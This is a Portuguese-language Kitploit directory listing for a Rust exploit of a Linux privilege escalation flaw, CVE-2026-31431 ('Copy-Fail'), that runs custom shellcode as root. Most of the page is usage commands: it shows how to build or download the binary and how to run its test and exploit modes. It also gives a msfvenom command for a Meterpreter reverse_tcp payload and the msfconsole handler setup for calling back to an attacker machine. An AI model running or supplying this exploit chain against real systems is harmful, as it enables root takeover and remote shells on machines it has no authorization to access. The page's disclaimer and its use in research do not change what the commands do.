Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/iss4cf0ng/cve-2026-31431-linux-copy-fail
Escalada de PrivilégiosFrameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoDesenvolvimento de PayloadsExploração de Binários
GitHubiss4cf0ng/cve-2026-31431-linux-copy-fail

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-31431-Linux-Copy-Fail

Exploit de escalada de privilégios local baseado em Rust para CVE-2026-31431, permitindo a execução de shellcode personalizado, como Meterpreter, em sistemas Linux.

Ver RepositórioSite
5621há 3 mesesRevisado pelo Kitploit

CVE-2026-31431 - Exploit Linux Copy-Fail (Rust)

Uma implementação em Rust de um exploit de escalonamento local de privilégios para o CVE-2026-31431 (Copy-Fail).

Ele permite executar shellcode personalizado (como Meterpreter)

Introdução

Xint divulgou o CVE-2026-31431, uma vulnerabilidade de escrita arbitrária no page cache que encadeia AF_ALG e splice() para alcançar uma primitiva de escrita de 4 bytes.

Fonte: Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

Aviso Legal

Este projeto foi desenvolvido como parte do meu interesse pessoal em estudar segurança cibernética. No entanto, ele pode potencialmente ser usado indevidamente para fins maliciosos.

NÃO use esta ferramenta para quaisquer atividades ilegais.

O autor não é responsável por qualquer uso indevido deste software.

Agradecimentos

  • theori-io/copy-fail-CVE-2026-31431

Nota: O trabalho original usa shellcode comprimido/codificado (ex.: /bin/sh). Nesta implementação, eu o substituí por um shellcode /bin/bash bruto (não comprimido), facilitando a personalização ou a substituição direta por payloads fornecidos pelo usuário.

Como Compilar

Clone o projeto e execute o build.sh:

root@kitploit:~
git clone [email protected]:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
cd ./CVE-2026-31431-Linux-Copy-Fail
chmod +x ./build.sh
./build.sh

Uso

Baixe e extraia o pacote de lançamento:

root@kitploit:~
wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86

Os binários fornecem as opções abaixo:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin

Demonstração

Testar a Vulnerabilidade

Na máquina vulnerável:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test

Exploração

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --exploit

Meterpreter

Use o comando abaixo (defina PrependSetUid como True) para gerar o payload Meterpreter:

root@kitploit:~
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin

Na máquina do atacante (Kali Linux):

root@kitploit:~
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run

Na máquina vulnerável:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin

Versões Afetadas

  • Ubuntu
  • Redhat
Baixar ferramenta